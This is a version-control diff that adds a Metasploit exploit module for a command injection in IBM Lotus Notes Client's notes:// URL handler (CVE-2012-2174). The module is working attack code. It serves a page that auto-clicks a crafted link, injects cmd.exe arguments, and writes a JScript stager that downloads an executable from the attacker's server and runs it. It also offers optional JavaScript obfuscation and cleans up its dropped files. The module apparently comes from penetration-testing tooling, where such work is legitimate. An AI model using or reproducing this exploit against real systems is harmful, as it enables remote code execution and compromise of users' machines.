added module for ZDI-12-154
parent
d2e3e5defb
commit
4c897c5181
|
@ -0,0 +1,189 @@
|
|||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpServer::HTML
|
||||
include Msf::Exploit::EXE
|
||||
include Msf::Exploit::FileDropper
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => "IBM Lotus Notes Client URL Handler Command Injection",
|
||||
'Description' => %q{
|
||||
This modules exploits a command injection vulnerability in the URL handler for
|
||||
for the IBM Lotus Notes Client <= 8.5.3. The registered handler can be abused with
|
||||
an specially crafted notes:// URL to execute arbitrary commands with also arbitrary
|
||||
arguments. This module has been tested successfully on Windows XP SP3 with IE8,
|
||||
Google Chrome 23.0.1271.97 m and IBM Lotus Notes Client 8.5.2.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Moritz Jodeit', # Vulnerability discovery
|
||||
'Sean de Regge', # Vulnerability analysis
|
||||
'juan vazquez' # Metasploit
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2012-2174' ],
|
||||
[ 'OSVDB', '83063' ],
|
||||
[ 'BID', '54070' ],
|
||||
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-154/' ],
|
||||
[ 'URL', 'http://pwnanisec.blogspot.com/2012/10/exploiting-command-injection.html' ],
|
||||
[ 'URL', 'http://www-304.ibm.com/support/docview.wss?uid=swg21598348' ]
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 2048,
|
||||
'StackAdjustment' => -3500
|
||||
},
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => "none",
|
||||
'InitialAutoRunScript' => 'migrate -k -f'
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Automatic', {} ]
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => "Jun 18 2012",
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def exploit
|
||||
@exe_name = rand_text_alpha(2) + ".exe"
|
||||
@stage_name = rand_text_alpha(2) + ".js"
|
||||
super
|
||||
end
|
||||
|
||||
def on_new_session(session)
|
||||
if session.type == "meterpreter"
|
||||
session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")
|
||||
end
|
||||
|
||||
@dropped_files.delete_if do |file|
|
||||
win_file = file.gsub("/", "\\\\")
|
||||
if session.type == "meterpreter"
|
||||
begin
|
||||
wintemp = session.fs.file.expand_path("%TEMP%")
|
||||
win_file = "#{wintemp}\\#{win_file}"
|
||||
# Meterpreter should do this automatically as part of
|
||||
# fs.file.rm(). Until that has been implemented, remove the
|
||||
# read-only flag with a command.
|
||||
session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|)
|
||||
session.fs.file.rm(win_file)
|
||||
print_good("Deleted #{file}")
|
||||
true
|
||||
rescue ::Rex::Post::Meterpreter::RequestError
|
||||
print_error("Failed to delete #{win_file}")
|
||||
false
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
|
||||
if request.uri =~ /\.exe$/
|
||||
return if ((p=regenerate_payload(cli))==nil)
|
||||
register_file_for_cleanup("#{@stage_name}") unless @dropped_files and @dropped_files.include?("#{@stage_name}")
|
||||
register_file_for_cleanup("#{@exe_name}") unless @dropped_files and @dropped_files.include?("#{@exe_name}")
|
||||
data = generate_payload_exe({:code=>p.encoded})
|
||||
print_status("Sending payload")
|
||||
send_response(cli, data, {'Content-Type'=>'application/octet-stream'})
|
||||
return
|
||||
end
|
||||
|
||||
my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
|
||||
if datastore['SSL']
|
||||
schema = "https"
|
||||
else
|
||||
schema = "http"
|
||||
end
|
||||
uri = "#{schema}://#{my_host}"
|
||||
uri << ":#{datastore['SRVPORT']}#{get_resource()}/#{rand_text_alpha(rand(6)+3)}.exe"
|
||||
|
||||
script = "var w=new ActiveXObject('wscript.shell');"
|
||||
script << "w.CurrentDirectory=w.ExpandEnvironmentStrings('\\%TEMP\\%');"
|
||||
script << "var x=new ActiveXObject('Microsoft.XMLHTTP');"
|
||||
script << "x.open('GET','#{uri}', false);"
|
||||
script << "x.send();"
|
||||
script << "var s=new ActiveXObject('ADODB.Stream');"
|
||||
script << "s.Mode=3;"
|
||||
script << "s.Type=1;"
|
||||
script << "s.Open();"
|
||||
script << "s.Write(x.responseBody);"
|
||||
script << "s.SaveToFile('#{@exe_name}',2);"
|
||||
script << "w.Run('#{@exe_name}');"
|
||||
|
||||
vmargs = "/q /s /c echo #{script} > %TEMP%\\\\#{@stage_name}& start cscript %TEMP%\\\\#{@stage_name}& REM"
|
||||
|
||||
link_id = rand_text_alpha(5 + rand(5))
|
||||
|
||||
js_click_link = %Q|
|
||||
function clickLink(link) {
|
||||
var cancelled = false;
|
||||
|
||||
if (document.createEvent) {
|
||||
var event = document.createEvent("MouseEvents");
|
||||
event.initMouseEvent("click", true, true, window,
|
||||
0, 0, 0, 0, 0,
|
||||
false, false, false, false,
|
||||
0, null);
|
||||
cancelled = !link.dispatchEvent(event);
|
||||
}
|
||||
else if (link.fireEvent) {
|
||||
cancelled = !link.fireEvent("onclick");
|
||||
}
|
||||
|
||||
if (!cancelled) {
|
||||
window.location = link.href;
|
||||
}
|
||||
}
|
||||
|
|
||||
|
||||
if datastore['OBFUSCATE']
|
||||
js_click_link = ::Rex::Exploitation::JSObfu.new(js_click_link)
|
||||
js_click_link.obfuscate
|
||||
js_click_link_fn = js_click_link.sym('clickLink')
|
||||
else
|
||||
js_click_link_fn = 'clickLink'
|
||||
end
|
||||
|
||||
|
||||
html = <<-EOS
|
||||
<html>
|
||||
<head>
|
||||
<script>
|
||||
#{js_click_link}
|
||||
</script>
|
||||
</head>
|
||||
<body onload="#{js_click_link_fn}(document.getElementById('#{link_id}'));">
|
||||
<a id="#{link_id}" href="notes://#{rand_text_alpha_upper(3+rand(3))}/#{rand_text_alpha_lower(3+rand(3))} -RPARAMS java -vm c:\\windows\\system32\\cmd.exe -vmargs #{vmargs}"></a>
|
||||
</body>
|
||||
</html>
|
||||
EOS
|
||||
|
||||
print_status("Sending html")
|
||||
send_response(cli, html, {'Content-Type'=>'text/html'})
|
||||
|
||||
end
|
||||
|
||||
end
|
Loading…
Reference in New Issue